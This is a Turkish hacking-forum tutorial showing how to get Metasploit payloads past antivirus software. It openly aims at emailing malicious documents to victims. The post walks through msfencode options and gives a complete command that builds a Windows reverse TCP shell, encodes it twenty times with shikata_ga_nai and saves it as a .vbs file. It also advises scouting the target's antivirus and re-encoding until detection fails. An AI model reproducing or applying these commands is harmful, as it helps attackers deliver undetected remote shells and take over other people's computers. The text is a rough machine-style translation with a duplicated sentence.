THT DUYURU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

chat
Seçenekler

[SiyahYunus] Antiviruslere Yakalanmama Ve M3sploit

SiyahYunus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2020
Mesajlar:
32
Konular:
12
Teşekkür (Etti):
7
Teşekkür (Aldı):
16
Ticaret:
(0) %
10-04-2020 15:45
#1
[SiyahYunus] Antiviruslere Yakalanmama Ve M3sploit
Meterplayer ile yük taşıyan veya sistemin sahibi olmanızı sağlayan geri kabuk içeren kötü amaçlı bir PDF veya kötü amaçlı Word belgesi oluşturma konusunda birkaç dinleyici kılavuzu yazdım . Bu teknikleri kullanmanın önündeki engeller hedef sistemdeki antivirüs (AV) yazılımıdır . Örneğin, kötü amaçlı bir PDF veya Word doc'u e-postayla göndermeye çalışırsanız, kurban sistemi kurbana bir virüs veya başka bir zararlı yazılım içerdiğini bildirir muhtemeldir.
Bu dersin ana dersi, bu virüsten koruma yazılımını nasıl geçebileceğimiz.

Antivirüs Yazılımının İşleyişi Hakkında Temel Bilgiler

Virüsten koruma yazılımı şirketleri genellikle yazılımlarını, virüslerin ve diğer kötü amaçlı yazılımların "imzasını" aramak için geliştirir. Çoğu durumda, bilinen zararlı yazılımların tanıdık bir kalıbı için kodun ilk birkaç satırına bakarlar. Vahşi malware bulduklarında, imzalarını virüs / kötü amaçlı yazılım veritabanına eklerler ve bir sonraki bu kötü amaçlı yazılımla karşılaştığında yazılım bilgisayar sahibini uyarır.


Antivirüs Yazılımını Nasıl Atlatabilirsiniz

Açıkçası, sıfır günlük istismar veya yepyeni olan ve AV yazılımı şirketleri tarafından hiç görülemeyen kötü amaçlı yazılımlar, böyle bir algılama şemasında doğru bir şekilde geçecektir.

AV yazılımını geçmenin başka bir yöntemi, kötü amaçlı yazılımın "imzasını" değiştirmek. Başka bir deyişle, kötü amaçlı yazılım kodlamasını işlevselliğini değiştirmeden değiştirebilirsek, AV yazılımını algılamadan kolayca geçmeliyiz. Kodlama becerilerine sahipseniz, herhangi bir kötü amaçlı yazılımı yeniden kodlayabilir ve istenen sonucu elde edebilirsiniz.
Bu gelişmiş kodlama becerilerine sahip değilseniz, hala umut var! ****sploit , msfencode adlı yerleşik bir komutu kullanıyor ve Sukrojan topluluğunu bir exploit imzasını gizlemeye ilişkin daha önceki bir kılavuzda sunmuştum .

M3tasploit yüklerinin imza nasıl değiştirilir

Bu yazıda, bu komutu ve yüklerinizi yeniden kodlamak için olan yeteneklerini daha ayrıntılı inceleyeceğiz. Başlamadan önce hızlı bir not - keşif yap !

Hedef sistemin hangi AV yazılımını kullandığını bulun ve bu AV paketinden kaçınmak için yeniden kodlayın . Hiçbir yeniden kodlama şeması tüm AV yazılımı ile çalışmaz, bu nedenle AV yazılımınızla çalışan, ancak hedef sistemin AV yazılımından kaçınamayacak yeni bir kodlama şeması geliştirmek için vakit harcamayın.

Yani, BackTrack'i açın ve ****sploit'u çalıştıralım!

Msfencode kullanın
Yardım için -h anahtarıyla msfencode yazarak başlayalım .
Kod:
Msfencode -h
Gördüğünüz gibi, bu, bu komutla kullanabileceğimiz tüm anahtarları görüntüler. Not -e anahtarı. Bu, yükümüzü yeniden kodlamak için kullanmak istediğiniz kodlayıcıyı belirtir.

Ayrıca, -t anahtarı ile vurguladığım bölümü unutmayın . Bu anahtar çıktı formatının ne olduğunu belirler. Çiğ, yakut, perl, java, exe, vba, vbs, vb. Dahil olmak üzere birçok formatın olduğunu görebilirsiniz. Bu çıktıların her biri imza değiştirmek ve AV yazılımından kaçmak için bir fırsat verir.

Kodlama Şemalarını Listele
Sonra, msfencode'da hangi kodlayıcıların mevcut olduğunu inceleyelim.
Kod:
Msfencode -L


Bu ekran görüntüsünde olduğu gibi, msfencode çok sayıda farklı kodlama düzenleri içerir. Dördüncü sırada "shikata_ga_nai" görüyoruz. Not "mükemmel" ve bu bir "Polimorfik XOR Katkı Geri Besleme Enkoder" olduğunu. Şimdi buna bir göz atalım.


Şimdi, AV paket yazılımını eski hale getirmek için ters TCP kabuğumuzu yeniden kodlamak için shikata_ga_nai'yi kullanalım. BackTrack komut isteminde şunu yazın:

Kod:
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.101 R |msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/AVbypass.vbs
Bu komutu ayrı tutalım ve ne yaptığına bakalım.
Kod:
msfpayload windows/shell/reverse_tcp LHOST 192.168.1.101 R
Yukarıdaki bölüm, 192.168.1.101 adresindeki bir yerel ana bilgisayar için ters TCP kabuğu ile bir yük oluşturur.

Kod:
|
Bu sembol, aşağıdaki komutu dolduran boru anlamına gelir.
Kod:
msfencode -e x86/shikata_ga_nai -c 20 -t vbs
Bu yükü skikata_ga_nai ile yeniden kodlamak ve bunu 20 kez çalıştırmak (-c 20) ve daha sonra bir .vbs komut dosyası gibi görünmek üzere kodlamak demektir.

Kod:
> /root/AVbypass.vbs
Yeni şifrelenmiş olan yükü, / root dizinindeki bir dosyaya gönderir ve AVbypass.vbs olarak adlandırır, böylece .vbs komut dosyası gibi görünür.

Yeni şifrelenmiş olan yükü, / root dizinindeki bir dosyaya gönderir ve AVbypass.vbs olarak adlandırır, böylece .vbs komut dosyası gibi görünür.

Bu komutu çalıştırdığımızda, shikata_ga_nai'nin 20 yinelemeyle yükümüzü çalıştırdığını gösteren aşağıdaki çıktıyı alıyoruz.

Şimdi shikata_ga_nai'ye yeni şifrelenmiş yükümüzü göndermek ve orada olup olmadığını kontrol etmek için söylediği dizine gidelim.

Kod:
cd /root
ls -l

Gördüğünüz gibi şimdi, AVbypass.vbs adlı bir kök dizinde bir dosyamız var, şimdi hedefin AV yazılımına karşı bunu test edip etmediğini test edebiliyoruz. Çoğu durumda bu yöntem işe yarıyor, ancak değilse, AV yazılımının algılamadığı bir kodlamayı buluncaya kadar yükü çeşitli yinelemelerle göndermeniz yeterlidir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler